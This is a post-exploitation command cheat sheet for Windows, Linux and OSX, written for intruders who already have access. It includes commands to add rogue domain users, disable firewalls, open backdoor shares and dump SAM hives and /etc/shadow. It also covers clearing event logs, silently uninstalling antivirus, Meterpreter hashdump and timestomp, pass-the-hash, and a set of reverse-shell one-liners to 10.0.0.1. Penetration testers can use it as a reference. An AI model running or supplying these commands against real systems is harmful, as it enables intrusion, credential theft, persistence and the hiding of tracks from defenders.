Windows Post Exploitation Command List

# Blind files
(things to pull when all you can do is blindly read) LFI/dir traversal
%SYSTEMDRIVE%\boot.ini

# System
##example: COMMAND [syntax1] | [syntax2] (explanation1; explanation2)
whoami
whoami /all
set
qwinsta
qprocess *
at
schtasks [/query /fo csv /v]
net start
sc getkeyname "Shell Hardware Detection" (use name from net start)
sc qc ShellHWDetection (use keyname from getkeyname)
net config workstation
net time
net file
net session
net use
tasklist [/m] | [/svc] | [/m {dll}]
fsutil fsinfo drives

# Networking
ipconfig /all
ipconfig /displaydns
netstat -bano
netstat -s -p [tcp|udp|icmp|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENING //comment: (XP and up for -o flag to get PID, zuk)
netstat -na | findstr LISTENING (Any windows, generic)
netsh diag show all
net view
net view /domain
net view /domain:otherdomain
net user hacker hacker /add /domain (adds a user to the current domain -invasive-)
net user %USERNAME% /domain
net user /domain
net accounts
net accounts /domain
net localgroup administrators
net localgroup administrators /domain (as this was supposed to use localgroup&domain, this is actually another way of getting *current* domain admins. Zuk)
net group "domain admins" /domain
net group "enterprise admins" /domain
net group "domain controllers" /domain
nbtstat -a [ip_here]
net share
net session | find /c "\\"
arp -a
route print
netsh firewall set opmode disable (turns off firewall -invasive-)
netsh firewall set opmode enable (enables firewall -might cause loss of connection-)

# Configs
gpresult /z
sc qc [ Service name ]
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hosts
dir %PROGRAMFILES%
echo %COMSPEC%

# Finding important files
tree C:\ /f
dir /a
dir /b /s [Directory -- filename]
Command | find /c /v ""

# Files to pull if possible
%WINDIR%\repair\sam
%WINDIR%\System32\drivers\etc\hosts

# Remote System Access
net share \\computername
tasklist /V /S computername
net share nothing$=C:\ /grant:hacker,FULL /unlimited -invasive-
#net user hacker hacker /add
#net localgroup administrators /add hacker
#net use X: \\target\nothing$ hacker /USER:hacker
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername (maps IPC$ which does not show up as a drive)
net use \\computername /user:DOMAINNAME\username password (maps IPC$ under another username)
net time \\computername (Shows the time of target computer)
dir \\computername\share_or_admin_share\ (dir list a remote directory)
tasklist /V /S computername (Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done, so if you are using another user, you need to reinitiate the IPC$ mount)

# WMI
wmic bios
wmic qfe
wmic qfe get hotfixid (This gets patch IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create "process_name" (executes a program)
wmic process where name="process_name" call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? to get help)
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

# Reg Command
reg save HKLM\Security security.hive (Save security hive to a file)
reg save HKLM\System system.hive (Save system hive to a file)
reg save HKLM\SAM sam.hive (Save sam to a file)
reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName ]
reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can add /s to recurse all values)

# Deleting Logs
wevtutil el (list logs)
wevtutil cl <LogName> (Clear specific log)
del %WINDIR%\*.log /a /s /q /f

# Uninstalling Software "AntiVirus" (Non interactive)
wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /Interactive:Off (this uninstalls software)

# Other
pkgmgr /iu:"Package" (useful)
pkgmgr /iu:"TelnetServer" (Install Telnet Service ...)
pkgmgr /iu:"TelnetClient" (Client)
rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
wscript.exe <script js/vbs>
cscript.exe <script js/vbs/c#>

## OS SPECIFIC

# Win2k3
winpop stat domainname

# Vista/7
winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm

(Page break just so we can have the straight up cmds on their own)

## Meterpreter Commands
ps (show running processes and their associated users/id numbers)
getuid
getpid
getprivs (shows current privileges)
getsystem (attempts to get SYSTEM, be warned, attempts Kitrap0d local exploit as well)
sysinfo
timestomp (Remove/screw up timestamps; if you are good enough this messes up audit tools)
clearev
hashdump (dump SAM file hashes for pass the hash or cracking) or 'run hashdump'
migrate [pid number] (Move from exploited process into another process)

## Useful Meterpreter Scripts

## Useful Meterpreter Post Modules
vsploit
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
post/windows/escalate/bypassuac (mixed results)

## Useful Techniques
"Pass The Hash" attack (Gain access to other computers with stolen hashes, no cracking involved)

Change Wallpaper
Ex: You have to upload a file called wallpaper.bmp to C: drive
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\wallpaper.bmp"
rundll32.exe user32.dll,UpdatePerUserSystemParameters

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN

-=SYSTEM=-

| Command | Expected and / or Sample Output |
| --- | --- |
| whoami | Returns the username you're logged in as. |
| systemconfig | |

Linux/Unix/BSD Post Exploitation Command List

# Blind files
(things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it won't trigger an IDS)
/etc/motd, /etc/issue

# System

uname -a
ps aux
ps -aef
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
which nmap (see if it's already installed)
locate bin/nmap
which nc (see if it's already installed)
locate bin/<whatever you want>
whoami
jps -l

# Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi

# Configs
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/lsb-release
cat /etc/redhat-release
cat /etc/samba/smb.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers

# Determine Distro:
/etc/SUSE-release # Novell SUSE
/etc/redhat-release, /etc/redhat_version # Red Hat
/etc/fedora-release # Fedora
/etc/slackware-release, /etc/slackware-version # Slackware
/etc/debian_release, /etc/debian_version # Debian
/etc/mandrake-release # Mandrake
/etc/sun-release # Sun JDS
/etc/release # Solaris/Sparc
/etc/gentoo-release # Gentoo
/etc/lsb-release # ubuntu
?? # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a (often hints at it pretty well)

# Installed Packages
rpm -qa --last | head
yum list | grep installed
dpkg -l
dpkg -l | grep -i "linux-image"
pkg_info # FreeBSD

#Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf

# Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | sed 's/:/ /g'` -perm -4000 # find suids

## Per User
ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*
find /home/*/.vnc /home/*/.subversion -type f
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l

## Priv (sudo'd or as root)
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/*
lsof -nPi
ls /home/*/.ssh/*

## Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheatsheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many do NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
Listener- Xnest :1
Add permission to connect- xhost +victimIP

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN

-=SYSTEM=-

| Command | Expected and / or Sample Output |
| --- | --- |
| uname -a | Linux kernel version, distribution |
| ps aux | List of running processes |
| id | List current user and group along with user/group id |
| w | Show who is logged in and what they are doing |
| who -a | Print information about users |

OSX Post Exploitation Command List

# Blind files
(things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it won't trigger an IDS)

#SYSTEM
uname -a
sw_vers -productName
sw_vers -productVersion
system_profiler
id
printenv
who
ps aux
ps ea
ls -alh /Applications/
"/Library/Application Support/VMware Fusion/vmrun" list
"/Library/Application Support/VMware Fusion/vmrun" CopyFileFromHostToGuest windowsmalicious.exe WindowsVM
"/Library/Application Support/VMware Fusion/vmrun" captureScreen WindowsVM

Snow Leopard and Lion
dscacheutil -q user
dscacheutil -q group

Tiger
lookupd -q user
lookupd -q group

#Networking
ifconfig
netstat -np tcp
netstat -np udp

#Configs
ls -alh /private/etc/

#Finding Important Files
ls -ma ~/
ls -alh /Users/
ls -alh /Users/*/.ssh/
ls -alh /Users/*/.gnupg/

#Files to pull

#Remote System Access

#Priv
cat "/Library/Application Support/Objective Development/Little Snitch/rules.xpl"
ls "/Library/Application Support/VMware Fusion/licenses/site/"